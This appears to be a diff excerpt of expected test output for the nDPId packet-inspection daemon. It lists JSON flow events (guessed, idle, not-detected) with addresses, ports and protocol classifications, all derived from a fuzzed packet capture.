00828{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635046,"flow_last_seen":1120469635046,"flow_idle_time":7440000,"flow_min_l4_payload_len":3,"flow_max_l4_payload_len":3,"flow_tot_l4_payload_len":3,"flow_avg_l4_payload_len":3,"midstream":1,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"192.168.1.2","src_port":21,"dst_port":2208,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"1":"Match by port"},"proto":"FTP_CONTROL","breed":"Unsafe","category":"Download"},"ftp": {"user":"","password":"","auth_failed":0}}
00589{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635046,"flow_last_seen":1120469635046,"flow_idle_time":7440000,"flow_min_l4_payload_len":3,"flow_max_l4_payload_len":3,"flow_tot_l4_payload_len":3,"flow_avg_l4_payload_len":3,"midstream":1,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"192.168.1.2","src_port":21,"dst_port":2208,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00607{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635173,"flow_last_seen":1120469635173,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"192.232.1.2","src_port":58999,"dst_port":2721,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635173,"flow_last_seen":1120469635173,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"192.232.1.2","src_port":58999,"dst_port":2721,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00828{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635046,"flow_last_seen":1120469635046,"flow_idle_time":7560000,"flow_min_l4_payload_len":3,"flow_max_l4_payload_len":3,"flow_tot_l4_payload_len":3,"flow_avg_l4_payload_len":3,"midstream":1,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"192.168.1.2","src_port":21,"dst_port":2208,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"1":"Match by port"},"proto":"FTP_CONTROL","breed":"Unsafe","category":"Download"},"ftp": {"user":"","password":"","auth_failed":0}}
00589{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635046,"flow_last_seen":1120469635046,"flow_idle_time":7560000,"flow_min_l4_payload_len":3,"flow_max_l4_payload_len":3,"flow_tot_l4_payload_len":3,"flow_avg_l4_payload_len":3,"midstream":1,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"192.168.1.2","src_port":21,"dst_port":2208,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00607{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635173,"flow_last_seen":1120469635173,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"192.232.1.2","src_port":58999,"dst_port":2721,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635173,"flow_last_seen":1120469635173,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"192.232.1.2","src_port":58999,"dst_port":2721,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":247,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471086377,"flow_last_seen":1120471086377,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"116.168.1.2","dst_ip":"192.168.1.1","src_port":2829,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":218,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1120470949427,"flow_last_seen":1120470958433,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2812,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":219,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470966440,"flow_last_seen":1120470966440,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2813,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
@@ -1401,37 +1401,37 @@
00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":246,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1120471084097,"flow_last_seen":1120471088463,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":188,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2830,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":248,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1120471094410,"flow_last_seen":1120471094412,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2831,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":249,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471107427,"flow_last_seen":1120471107427,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2832,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00606{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635152,"flow_last_seen":1120469635152,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"37.115.0.253","dst_ip":"192.168.1.2","src_port":58999,"dst_port":2721,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635152,"flow_last_seen":1120469635152,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"37.115.0.253","dst_ip":"192.168.1.2","src_port":58999,"dst_port":2721,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00606{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635152,"flow_last_seen":1120469635152,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"37.115.0.253","dst_ip":"192.168.1.2","src_port":58999,"dst_port":2721,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635152,"flow_last_seen":1120469635152,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"37.115.0.253","dst_ip":"192.168.1.2","src_port":58999,"dst_port":2721,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":221,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470971822,"flow_last_seen":1120470971822,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.37","src_port":29440,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
00661{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469620579,"flow_last_seen":1120469620579,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.71","dst_ip":"147.137.21.122","src_port":2718,"dst_port":139,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469620579,"flow_last_seen":1120469620579,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.71","dst_ip":"147.137.21.122","src_port":2718,"dst_port":139,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00659{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120469611651,"flow_last_seen":1120469614570,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"147.137.21.94","src_port":2718,"dst_port":139,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
00590{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120469611651,"flow_last_seen":1120469614570,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"147.137.21.94","src_port":2718,"dst_port":139,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00831{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635105,"flow_last_seen":1120469635105,"flow_idle_time":7440000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":19,"flow_tot_l4_payload_len":19,"flow_avg_l4_payload_len":19,"midstream":1,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"84.168.1.2","src_port":21,"dst_port":2720,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"1":"Match by port"},"proto":"FTP_CONTROL","breed":"Unsafe","category":"Download"},"ftp": {"user":"","password":"","auth_failed":0}}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635105,"flow_last_seen":1120469635105,"flow_idle_time":7440000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":19,"flow_tot_l4_payload_len":19,"flow_avg_l4_payload_len":19,"midstream":1,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"84.168.1.2","src_port":21,"dst_port":2720,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00661{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469620579,"flow_last_seen":1120469620579,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.71","dst_ip":"147.137.21.122","src_port":2718,"dst_port":139,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469620579,"flow_last_seen":1120469620579,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.71","dst_ip":"147.137.21.122","src_port":2718,"dst_port":139,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00659{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120469611651,"flow_last_seen":1120469614570,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"147.137.21.94","src_port":2718,"dst_port":139,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
00590{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120469611651,"flow_last_seen":1120469614570,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"147.137.21.94","src_port":2718,"dst_port":139,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00831{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635105,"flow_last_seen":1120469635105,"flow_idle_time":7560000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":19,"flow_tot_l4_payload_len":19,"flow_avg_l4_payload_len":19,"midstream":1,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"84.168.1.2","src_port":21,"dst_port":2720,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"1":"Match by port"},"proto":"FTP_CONTROL","breed":"Unsafe","category":"Download"},"ftp": {"user":"","password":"","auth_failed":0}}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635105,"flow_last_seen":1120469635105,"flow_idle_time":7560000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":19,"flow_tot_l4_payload_len":19,"flow_avg_l4_payload_len":19,"midstream":1,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"84.168.1.2","src_port":21,"dst_port":2720,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00662{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":217,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470924263,"flow_last_seen":1120470924263,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":137,"dst_port":905,"l4_proto":"udp","ndpi": {"confidence": {"1":"Match by port"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
00593{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":217,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470924263,"flow_last_seen":1120470924263,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":137,"dst_port":905,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00837{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635012,"flow_last_seen":1120469635012,"flow_idle_time":7440000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":12,"flow_tot_l4_payload_len":12,"flow_avg_l4_payload_len":12,"midstream":1,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"147.234.1.253","src_port":2679,"dst_port":21,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"1":"Match by port"},"proto":"FTP_CONTROL","breed":"Unsafe","category":"Download"},"ftp": {"user":"","password":"d0xa!","auth_failed":0}}
00593{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635012,"flow_last_seen":1120469635012,"flow_idle_time":7440000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":12,"flow_tot_l4_payload_len":12,"flow_avg_l4_payload_len":12,"midstream":1,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"147.234.1.253","src_port":2679,"dst_port":21,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00828{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635106,"flow_last_seen":1120469635106,"flow_idle_time":7440000,"flow_min_l4_payload_len":6,"flow_max_l4_payload_len":6,"flow_tot_l4_payload_len":6,"flow_avg_l4_payload_len":6,"midstream":1,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.112.1.2","dst_ip":"147.234.1.253","src_port":2720,"dst_port":21,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"1":"Match by port"},"proto":"FTP_CONTROL","breed":"Unsafe","category":"Download"},"ftp": {"user":"","password":"","auth_failed":0}}
00589{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635106,"flow_last_seen":1120469635106,"flow_idle_time":7440000,"flow_min_l4_payload_len":6,"flow_max_l4_payload_len":6,"flow_tot_l4_payload_len":6,"flow_avg_l4_payload_len":6,"midstream":1,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"192.112.1.2","dst_ip":"147.234.1.253","src_port":2720,"dst_port":21,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00833{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635043,"flow_last_seen":1120469635043,"flow_idle_time":7440000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":1,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"192.168.1.66","src_port":21,"dst_port":2720,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"1":"Match by port"},"proto":"FTP_CONTROL","breed":"Unsafe","category":"Download"},"ftp": {"user":"","password":"","auth_failed":0}}
00594{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635043,"flow_last_seen":1120469635043,"flow_idle_time":7440000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":1,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"192.168.1.66","src_port":21,"dst_port":2720,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00833{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635052,"flow_last_seen":1120469635052,"flow_idle_time":7440000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":41,"flow_tot_l4_payload_len":41,"flow_avg_l4_payload_len":41,"midstream":1,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"192.168.65.2","src_port":21,"dst_port":2720,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"1":"Match by port"},"proto":"FTP_CONTROL","breed":"Unsafe","category":"Download"},"ftp": {"user":"","password":"","auth_failed":0}}
00594{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635052,"flow_last_seen":1120469635052,"flow_idle_time":7440000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":41,"flow_tot_l4_payload_len":41,"flow_avg_l4_payload_len":41,"midstream":1,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"192.168.65.2","src_port":21,"dst_port":2720,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00832{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":691,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469635048,"flow_last_seen":1120469635048,"flow_idle_time":7440000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":59,"flow_avg_l4_payload_len":59,"midstream":1,"thread_ts_msec":1120471107427,"l3_proto":"ip4","src_ip":"147.234.1.253","dst_ip":"192.168.1.2","src_port":21,"dst_port":2732,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"1":"Match by port"},"proto":"FTP_CONTROL","breed":"Unsafe","category":"Download"},"ftp": {"user":"","password":"","auth_failed":0}}
